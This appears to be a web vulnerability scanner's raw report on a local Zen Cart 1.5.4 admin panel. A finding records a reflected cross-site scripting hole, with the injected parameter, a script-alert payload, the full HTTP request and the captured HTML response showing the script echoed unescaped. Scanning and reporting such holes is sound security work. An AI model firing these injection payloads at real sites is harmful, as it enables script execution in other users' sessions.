    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/product.php?product_type=0&pID=325&action=new_product_preview&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      &nbsp;    </td>
    <td class="headerBarContent" align="center">
Wednesday 30 Dec 2015 11:09:57 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00<span class="errorText"><br />Warning: Does not show Quantity Box, Default to Qty 1</span></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/no_picture.gif" border="0" alt="admin" title=" admin " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14515090.16657)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Wednesday 30 December, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="6dead581bdfe002d6b2ac17b640835d1" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="6dead581bdfe002d6b2ac17b640835d1" /><input type="hidden" name="products_date_added" value="2015-12-30 23:01:06" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="hidden" name="master_categories_id" value="0" /><input type="hidden" name="products_discount_type" value="0" /><input type="hidden" name="products_discount_type_from" value="0" /><input type="hidden" name="products_price_sorter" value="0.0000" /><input type="hidden" name="products_status" value="0" /><input type="hidden" name="products_date_available" value="12/30/2015" /><input type="hidden" name="manufacturers_id" /><input type="hidden" name="product_is_free" value="0" /><input type="hidden" name="product_is_call" value="0" /><input type="hidden" name="products_priced_by_attribute" value="0" /><input type="hidden" name="products_tax_class_id" value="1" /><input type="hidden" name="products_price" value="12" /><input type="hidden" name="products_price_gross" value="12" /><input type="hidden" name="products_virtual" value="0" /><input type="hidden" name="product_is_always_free_shipping" value="2" /><input type="hidden" name="products_qty_box_status" value="0" /><input type="hidden" name="products_quantity_order_min" value="12" /><input type="hidden" name="products_quantity_order_max" value="12" /><input type="hidden" name="products_quantity_order_units" value="12" /><input type="hidden" name="products_quantity_mixed" value="0" /><input type="hidden" name="products_quantity" value="1222111" /><input type="hidden" name="products_model" value="testval" /><input type="hidden" name="products_previous_image" /><input type="hidden" name="img_dir" /><input type="hidden" name="image_delete" value="0" /><input type="hidden" name="overwrite" value="1" /><input type="hidden" name="products_image_manual" /><input type="hidden" name="products_weight" value="0" /><input type="hidden" name="products_sort_order" value="0" /><input type="hidden" name="products_name[1]" value="admin" /><input type="hidden" name="products_description[1]" value="&lt;script&gt;alert(14515090.16657)&lt;/script&gt;" /><input type="hidden" name="products_url[1]" value="http://www.kelev.biz" /><input type="hidden" name="products_image" /><input type="image" src="includes/languages/english/images/buttons/button_back.gif" border="0" alt="Back" title=" Back " name="edit">&nbsp;&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update ">&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/categories.php?cPath=&pID=325"><img src="includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel "></a>        </td>
      </tr>
    </table></form>
    </td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br />
</body>
</html>

Finding 3.44:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14515090.17347)</script>
Detection value: alert(14515090.17347)

HTTP Request 
POST /zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product
Cookie: zenAdminID=h0ro03kt8iei0mbcu4kviq7pn2
Content-Type: multipart/form-data; boundary=---------------------------18630105114717
Content-Length: 4395

-----------------------------18630105114717
Content-Disposition: form-data; name="securityToken"

6dead581bdfe002d6b2ac17b640835d1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_added"

2015-12-30 23:01:06
-----------------------------18630105114717
Content-Disposition: form-data; name="x"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="y"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="master_categories_id"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price_sorter"

0.0000
-----------------------------18630105114717
Content-Disposition: form-data; name="products_status"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_available"

12/30/2015
-----------------------------18630105114717
Content-Disposition: form-data; name="manufacturers_id"


-----------------------------18630105114717
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------18630105114717
Content-Disposition: form-data; name="products_qty_box_status"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_mixed"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------18630105114717
Content-Disposition: form-data; name="products_model"

testval
-----------------------------18630105114717
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------18630105114717
Content-Disposition: form-data; name="products_previous_image"


-----------------------------18630105114717
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------18630105114717
Content-Disposition: form-data; name="image_delete"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="overwrite"

1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------18630105114717
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14515090.17347)</script>
-----------------------------18630105114717
Content-Disposition: form-data; name="products_weight"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_added"

2015-12-30 23:01:06
-----------------------------18630105114717--

HTTP Response

HTTP/1.1 200 OK
Date: Wed, 30 Dec 2015 23:10:07 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
if (typeof _editor_url == "string") HTMLArea.replaceAll();
 }
 // -->
</script>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="init()">
<div id="spiffycalendar" class="text"></div>
<!-- header //-->
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/product.php?product_type=0&pID=325&action=new_product_preview&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      &nbsp;    </td>
    <td class="headerBarContent" align="center">
Wednesday 30 Dec 2015 11:10:08 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
